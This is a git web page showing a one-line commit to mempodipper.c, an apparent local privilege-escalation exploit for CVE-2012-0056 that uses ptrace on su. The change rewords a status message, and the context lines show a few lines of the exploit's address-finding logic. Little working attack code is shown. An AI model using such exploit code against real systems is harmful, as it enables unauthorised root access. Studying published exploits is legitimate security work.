aboutsummaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 08:50:02 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-24 08:50:02 +0100
commit47795fcfdc9e1637df2752bac39b38ca574f40a8 (patch)
tree09cc9ca7d4fe3db656107ec89d304159381c0ebc
parentUse ptrace in mempodipper. (diff)
downloadCVE-2012-0056-47795fcfdc9e1637df2752bac39b38ca574f40a8.tar.xz
CVE-2012-0056-47795fcfdc9e1637df2752bac39b38ca574f40a8.zip
Not always exit@plt
-rw-r--r--mempodipper.c2
1 files changed, 1 insertions, 1 deletions
diff --git a/mempodipper.c b/mempodipper.c
index dc02c31..dcc037c 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -197,7 +197,7 @@ int main(int argc, char **argv)
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
address = strtoul(argv[2], NULL, 16);
else {
- printf("[+] Ptracing su to find exit@plt without reading binary.\n");
+ printf("[+] Ptracing su to find next instruction without reading binary.\n");
address = ptrace_address();
if (!address) {
printf("[-] Ptrace failed.\n");